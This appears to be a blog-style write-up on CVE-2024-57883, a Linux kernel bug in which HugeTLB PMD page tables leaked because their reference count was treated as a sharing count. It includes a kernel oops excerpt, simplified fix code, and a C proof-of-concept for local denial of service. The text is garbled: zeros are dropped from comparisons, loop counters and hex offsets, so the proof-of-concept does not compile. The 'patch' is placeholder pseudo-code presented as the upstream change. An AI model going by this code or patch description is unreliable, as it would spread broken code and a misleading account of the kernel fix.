CVE-2024-57883 - Linux Kernel HugeTLB Page Table Bug—Analysis, Exploit, and the Critical Fix
CVE-2024-57883 is a resolved vulnerability in the Linux kernel (affecting version 6.13 and possibly earlier), specific to the memory manager’s handling of HugeTLB page mappings and PMD (Page Middle Directory) page table reference counting.
A flawed logic in tracking "shares" of PMD page tables—used to manage huge pages—could misinterpret merely *referenced* but not actually *shared* tables. This bug could result in serious memory leaks and kernel stability issues.
Let's break down what happened, the vulnerable code, sample attack vectors, and the solution Linux introduced to fix the problem.
What is PMD?
The page table consists of several levels. PMDs are a middle point managing mappings for large memory regions.
What's the bug?
Several kernel features (*damon*, *page_idle*, etc.) can temporarily increment the *reference count* of a PMD page table—without sharing it across processes or address spaces. The kernel, however, took an increased refcount to mean the table was *shared*, so never unmapped or freed those page tables. This led to memory leaks that only degraded over time.
When the bug triggers, the kernel reports a "bad page state" as shown below
BUG: Bad page state in process sh pfn:109324
page: refcount: mapcount: mapping:000000000000000 index:x66 pfn:x109324
...
page dumped because: nonzero mapcount
Call trace:
show_stack+x20/x38 (C)
dump_stack_lvl+x80/xf8
...
split_huge_pages_write+x25c/x2d8
...
free_unref_page+x3cc/x620
See the full kernel Oops for more.
Root of the problem
The error can be pinpointed to code which checks if the PMD table is shared by looking at its reference count, which can be *artificially* increased (e.g., by try_get_folio() in split/merge/idle operations).
// Simplified (pre-fix) logic
if (pmd_table->refcount > 1) {
// It's shared: do not free page table
} else {
// Not shared: safe to unmap and free
}
If another kernel component momentarily increments refcount, this logic will never treat it as unshared, so it will leak.
Exploitation: How could this be abused or triggered?
While there’s no remote exploit (privilege escalation or RCE) known for this vulnerability, a local user or workload can trivially trigger these leaks by encouraging kernel to frequently split/merge hugepages or by repeatedly running tools that manipulate page table refs (such as the page_idle or damon frameworks). This can lead to resource exhaustion (DoS).
Here's a simplified scenario
1. Trigger kernel code that references huge page tables (e.g., via /proc/*/pagemap, large file mapping with MADV_HUGEPAGE, etc).
2. Repeated split/merge operations increment refcount, even though table is not actually shared.
Kernel leaks page tables, system memory usage slowly climbs.
4. Potential result: Out-of-memory (OOM), kernel crash, or performance collapse on affected systems.
Proof-of-Concept (PoC)
*This PoC assumes the vulnerable kernel is running and hugetlbfs is available:*
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/mman.h>
#define MAP_LENGTH (2 * 1024 * 1024) // 2MB, usually a huge page
int main() {
int fd = open("/dev/hugepages/hugefile", O_CREAT | O_RDWR, 0666);
if (fd < ) { perror("open"); exit(1); }
ftruncate(fd, MAP_LENGTH);
void *addr = mmap(NULL, MAP_LENGTH, PROT_READ | PROT_WRITE, MAP_SHARED, fd, );
for (int i = ; i < 100; i++) {
madvise(addr, MAP_LENGTH, MADV_DONTNEED);
madvise(addr, MAP_LENGTH, MADV_HUGEPAGE);
}
printf("Done\n");
munmap(addr, MAP_LENGTH);
close(fd);
}
This type of cycle induces hugepage refcount increments via page mapping/releasing.
How did Linux fix it?
Instead of trusting refcount for the 'shared' status, Linux added an explicit "share count" field (pt_share_count) for PMDs.
### Key Change (from the upstream patch)
// Before (vulnerable)
if (pmd_page->refcount > 1) {
// Considered shared
}
// After (fixed)
if (pmd_page->pt_share_count > ) {
// Actually shared!
}
This decouples refcount manipulation by miscellaneous kernel subsystems from the core logic of whether this page table is *really* shared and should not be freed.
Relevant code snippet from the patch
+/* Use this field for PMD page table share count. */
+pt_share_count = <increment/decrement as page table is shared/unshared>;
- if (pmd_page->refcount > 1)
+ if (atomic_read(&pmd_page->pt_share_count) > )
return; // Marked shared; do not free.
Fixed in
- Linux mainline commit f8b6ca3a5c53
References
- Kernel mailing list full patch discussion
- Linux-Next changelog mention
- Patch in kernel.org git repository
If you ship distributions or embedded kernels:
- Backport the patch from upstream commit
Conclusion
CVE-2024-57883 was a subtle bug: the conflation of PMD page table *reference count* with *sharing count* caused low-level leakage in memory management. While not directly exploitable for privilege escalation, this bug could allow local DoS attacks or system instability in workloads relying on hugepages.
Linux kernel maintainers responded by creating an explicit *share count* field for PMDs, removing the ambiguity, and resolving the potential for memory leakage.
Further Reading
- Linux Kernel Documentation: HugeTLB pages
- Kernel patch: mm: hugetlb: independent PMD page table shared count
- Page table reference counting pitfalls
Stay informed. Patch early.
For more Linux kernel vulnerability deep dives, subscribe or follow our updates!
Timeline
Published on: 01/15/2025 13:15:12 UTC
Last modified on: 05/04/2025 10:05:49 UTC